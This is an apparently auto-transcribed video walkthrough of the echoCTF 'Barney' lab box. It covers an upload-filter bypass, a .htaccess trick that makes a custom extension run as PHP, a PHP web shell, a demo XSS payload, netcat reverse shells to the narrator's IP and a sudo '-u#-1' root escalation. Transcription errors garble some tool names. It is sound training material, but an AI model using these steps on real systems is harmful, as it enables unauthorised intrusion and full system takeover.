What's up everyone? Today we are cracking Barney on echoCTF, a box where initial access comes from arbitrary upload and the privilege escalation, a sweet little sudo trick that gets us to root. I want to be transparent here though. One thing I wasn't too happy about this box is that to bypass the upload restriction I had to rely on a hint hidden in the box description. Not exactly hidden, but it was in the box description. Not ideal. But hey, it is what it is. Let's dive in and break down the box. So I already started the machine, as you can see here. Let's start by creating an nmap directory in order to save our nmap results. And let's do our scan, double verbose, all ports, T4, so it goes faster, and let's save all the results in the nmap directory and call it initial. So right off the bat we discovered port 80, so let's check that out. As you can see, we get a secure file upload module. Please choose a file to upload. PHP files are not accepted, and press submit to upload the file. Okay, can start a directory brute force to search for hidden files or directories till our nmap scan finishes. I'm gonna use GoBuster for this. So I'm gonna use the directory mode, the IP, and I'm gonna use the sec list wrap small words, save it as wrap small words.txt. However, before doing that, let's create a directory and call it fuzz. Jump in there and run our brute force. Scan is still going. So we can begin to manually check the file upload. Let me create another directory where we're gonna host our files. Okay. PHP files are not accepted, and press submit to upload the file. So for starts, let's try to upload just a txt file and see what happens. Nano test.txt. Okay, browse Barney test, open, submit. The connection will reset. I think this is because we are fuzzing the web server. Oh, there it is. So need peer to proceed. We get this error. It does not say that our file is not what the application expected. It's not a PHP. Let's try to upload an image. Maybe an image is what it needs. I'm gonna locate an image, say a PNG that lives locally on Kali. Let's just find one. I get this right here, copy it here. Okay, browse submit, and we get this again. So it seems that there is a restriction behind this upload functionality that doesn't allow us to upload any kind of file, it seems. And it says here need beer. We can open burp and examine the upload functionality to see what is going on. Burp. Let's see, is it still going? Nothing here yet. Okay, so great, just a minute. I have to close Mythic again. Sorry about that. Now I have to reopen burp. We found nothing from our tabbuster. Let's try another word list. Let's go with directories rather than words. Okay, so let's capture the upload request. Let's try to re-upload the file. Go to burp proxy, intercept on, and submit. And here we go. So this is the post request happening on the backend whenever we click submit query in order to upload the file. So whatever file type we're trying to upload is not going through, and we get this error message, need beer to proceed. And this is what I didn't like about this box, but it is what it is, as we said before. Let's read the description. So Barney may seem unsophisticated, but always seem to come back as quite smart on rare occasions. Provide a steady supply of beer and you may get something more than a burp. Okay, so we have a keyword here is highlighted as well. So it means that I think we have to inject this string somewhere in our request. What I did for this is just I replaced everything with the word beer, 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 beer. And now when we send the request, it seems that we get the flag as well, and we see that we are able to upload this file. Let's see that live as well. So you can go ahead and intercept on. Our file is already there. Let's choose it again, submit. Let's go back to repeater and copy this. Copied everything, forward, and as you can see, the file is successfully being uploaded, and we get to see it here. And that is our image, beer.beer. Okay. However, in order to be able to move, we have to find out which point of this requires beer as the word to bypass. So what I started doing is I started going backwards, right? So first I brought this back, the content disposition, send that again. We still can upload, so it's not that. Then I change this, the name, back to file upload, and we get the same error as before. So it seems that the name, it's the one that we have to inject the word beer in order to be able to upload files. So now that we know that, let's go back and try to upload a file with that theory in mind, right? So let's try to re-upload the test.txt, then maps scan is still going, go bastard did not find anything. Let's close this and continue. Okay, so we get intercept on, and let's try to upload the test.txt, submit, change this to the word beer, forward, and we are able to upload the file. Another important thing here is that whenever we try to access what we uploaded, you can see this is accessed in root, right? There is no directory like uploads or images that our uploads go. It goes directly to root, and that's very important, and we're gonna see in a bit why. Okay, so for now we know how to upload files. So the next thing we have to do is we have to understand what kind of server is that, right? And to do that, let's see the source code. PHP files are not allowed. We cannot get anything from here. What we can do is we can use index.php, for example, and you see nothing happens. If we go index.html, we don't get anything back. We get an error. So we know that the server supports PHP, right? Another way we could find this is try to run web, which will try to fingerprint the web server. Let's see that in action. 50.0, double compose, and it will start doing its thing. So as we can see here, the server we're against is an Apache, and we have PHP 7.1.32, and it's Debian. Okay, this is not exactly 100% that this is the case, but according to the tool, this is where it is. If nmap comes back, yep, there it is. It found port 80. Let's run a scan, I guess. I get against port 80 alone and throw all scripts on it, so we fingerprint the web server better, and save that to nmap all scripts. 50-A uses all scripts. I think this would be fast. Let's wait for it. Okay. So you can also see from the nmap that this is indeed Apache. So we're sure now that this server supports PHP for sure, right? This is enough if we can get index.php to work and we identify that other file types are not working but PHP is working. This is enough again, but I just showcase other ways we can find out what kind of programming language is the web server utilizing. So let's move on. The theory now is that we already know how to upload files, so let's try to upload a malicious web shell, right? A PHP web shell in this case. So for that we can do nano shell.php, do system, can do request pirate, save the file and try to upload it. Shell, set this on, submit, change this to beer, forward. So now we get another error saying that the file is not supported, and we do know that you won't be able to support PHP files, so we cannot get the PHP file uploaded. There is various techniques that we can try right now to bypass this, so let's get onto it. First of all, what we can do is try to brute force the file type. We can do that using fav. Let me get. First of all, we need to get the post request that we've been sending, which is this one. We can do that by copy to a file. Just choose a file. Let's go to home, my user, documents, echoCTF, Barney. Let's put that here and call it upload.txt. Save. Now we can go ahead and modify this, and we can specify here that we want beer, and here we're gonna put index, we're gonna say fuzz. Okay, the word fuzz, we put the word fuzz where we want the word list and fav to fuzz, right? So we save that, and now we can use fav likewise. Fav, we want to first specify that this is a post request. Specify the file. This is the request that we saved. We have to specify a protocol because by default fav is using HTTPS if I'm not mistaken. Request proto HTTP, and then we're gonna use a word list that includes different file of web extensions. Share, word list, sec lists, discovery, web content, if I'm not mistaken, and then web extensions. Big, we're gonna use a small for this, we don't need the big one. Okay, we can also send that to burp so we can see the request live and see if we did any mistake or if the attack is happening as expected. So can specify HTTP 10.127.0.0.1 port 8080. Let's go to the history and clear this so we can see what's going on. It's cleared, and run our attack. We did something wrong. Blah blah blah. Yeah, I did a mistake here. Too many zeros. Okay, good. So let's get back to burp, and here it is, all of our requests. Okay, you see here that the first extension that it tried is .txt. We did manage to upload the file, so we know that .txt can be uploaded. Let's move to the next one. This is XML. Good to know that we can upload XML. SWF, we can upload SWF. HTML, nothing comes back. FAR, SH, PL, DXC, PHP, NSF. Okay, that's supported from PHP. Pickup files. Upload C files, CGI. And as you can see here, we can upload PHP 2. Okay, so this is interesting because if the server supports PHP 2 file extensions and those get executed, we can trick it maybe and upload a PHP 2 file and still get execution. So let's go ahead and try that. So I'm gonna go back to our terminal and change shell PHP to shell PHP 2. And let's try to upload this. We can do that from here actually. So make this beer and make this shell PHP 2. Send. Okay, it's been uploaded. So now let's try to access it and see if we get execution or something. Shell.php2. Nothing happens. And as we can see, our payload is here, but is not being executed. Let's see what other file types we identified that we can upload. DLL, HTML. So we can upload HTML files. This is interesting if we are in a live engagement. Maybe we get an XSS, but let's try that just for the demonstration purposes. So we can go back here and create a file and call it demo.htm and just put some tags. H1, this is an XSS, H1, and we can go ahead and do script tags, alert, sub, and close the script. I don't remember if I have to put this the slash in front of that thing, but we'll see. So let's go back and try to upload this now. Why am I still doing that? I can't just grab this and do it from burp. Jesus. Okay, so demo htm, put that here, send, then go to demo.htm, and you see we get XSS, but in this case it's not helpful because it will not help us to get access. This is not the purpose of this box, and we get an XSS. Anyway, let's move on. Let's try to find other PHP file types that we can upload, and maybe we get execution. Back to the history, looking for PHP files, GSA, MDB, GSP, HTML, SQL. I don't see anything else. Far is another one that it would be nice if we could upload that. PHTML is another one. PHP 6 can go and try manually as well. So let's try that. Go here and say shell.phTML. It seems that it did upload. Okay, let's try PHP 7 as well, and also try far. Okay, we can upload different kind of files, but let's see if we can execute shell.phTML. You can access it, but it's not getting executed. PHP 7, same thing. So you get the point. Somehow the server manages to not only manages to cut or restrict the execution of PHP files. This is my understanding. I don't know if that's the case, to be honest. However, what we can do here is that, as you can see, whenever we upload a file, it gets to root. And Apache supports .ht access file. What is this, you may ask? So what is ht access file? Let's disable burp for now. And ht access is short for hypertext access. It's a configuration file used by Apache based web servers. It's not only Apache, there is more that utilizes this. Configuration files are used to set up the initial settings of a program or server. So what we can do here is that we can upload our own htaccess file, and this htaccess file normally it's at the root of the web server, of the Apache web server, and we can specify our own file types that are allowed to be uploaded. So let's go ahead and do that. So here we can say htaccess, right? And let me see if I have that in my notes. hack.com.cy notes, web file uploads, directory injection, limited file uploads, Windows specific attacks, directory, no. Here it is. And as I said before, also Lightspeed supports HT access. So here what we can do, okay, we can add this, and here we're specifying and we are saying that whenever Apache, we say, whenever you see .pirate as an extension of a file type .pirate, it means that this is a PHP file. Okay, use this as a PHP file. So now we can upload this, and it's successfully uploaded. Okay, and now when we go ahead and say shell.pirate and then put our web shell code, and upload this, it's been uploaded successfully. And now we can go ahead and do shell.pirate equals ID, and we get execution. Perfect. Now let's get the reverse shell. I don't think we'll need burp anymore. First of all, let's check if netcat is installed on the server, and see, and it's installed. I used which command to fetch the path of the binary netcat, and because it fetched back the binary, we know it exists on the server. So let's go ahead and start the listener. Sudo nc mdlp on port 80. Perfect. And specify RIP 10.11.150 on port 80. Specify the flag -e to execute bin bash, and run, and we get a callback. Perfect. Now we are on the box as laptop data. Let's update our shell. Again, I think I have this in my notes, how to upload the shell, how to not upload the shell, sorry, how to upgrade our shell using so where is Barney? To have that here. This is the privilege escalation path. Don't want to spoil it. Here it is. Copy. This, and now we have to do row minus echo. Oh, sorry, Control Z, then row minus echo, and I fucked up. Let's do it again. So on all the videos I upload on YouTube about echoCTF write-ups, I also upload them in my personal blog on this website that I'm creating. So you can find the write-ups there as well. Let's get the shell back. Okay, let's do this. Where do I have it? Let me, there it is. I utilize Python 3 to spawn a Python shell. Then Control Z. Then we do mass echo foreground. Click enter a couple of times. Then we can export term equals xterm. And also, in order to have a fully working TTY, we can go ahead and do stty-a, and we need rows and columns. Rows is 38, so we can go ahead and do stt rows 38 and columns 60. Perfect. Now we have a full functional shell. What I like to do first is, of course, do ID, see who we are. Then I like to see what other users do the web server have by grepping for whatever ends to sh, and we can see it's root and echoCTF. Also sudo l, and we get this, which is perfect. It seems that we can run anything but not root. I'm not exactly sure what that means, but because I didn't know, I googled it, and when I was trying to Google it, I found a little trick that we can do. So as we can say privilege escalation and paste this. And I did find a Reddit post, I remember. Maybe if we put that in quotes. Yeah, there it is. Sudo flow lets Linux users run command as root. And there is a dude here explaining. And what we need from here is this, I think, right? Or do we need the -1? I think, let's see. Is this one, right? Yeah, I think is this one right here. So if we run this, it hashtag in bash works as comment -1 id -u. We can see that we get 0. So this is root. If we remove -u, we get root. So let's go ahead and get the reverse shell as root. We're going to utilize netcode again. So we can do nc 10, 11, 150. Let's do 1337 -e bash and listen on 337. And we are root. And that's all from this video. I hope you guys enjoyed it. I hope you guys learned something new. It was an easy box and an interesting one as well, because during the time I was trying to bypass the upload functionality, I got so frustrated because I tried everything I knew. I couldn't find a way to upload it, and then when I went back and read the description that specifies the beer, and along with the error I was still getting with the beer keyword, then I decided to change everything to beer. Then I was able to upload a file, and the rest was pretty much straightforward. Thank you very much guys for watching this, and I'll see you in the next one. Make sure to comment, like and subscribe. Also, as I said before, I'm setting up a website where you guys can get the full write-up in a text format. And I also started to upload some of my personal notes of how I approach stuff and how I do CTFs. And yes, thank you very much, and see you in the next one. Bye.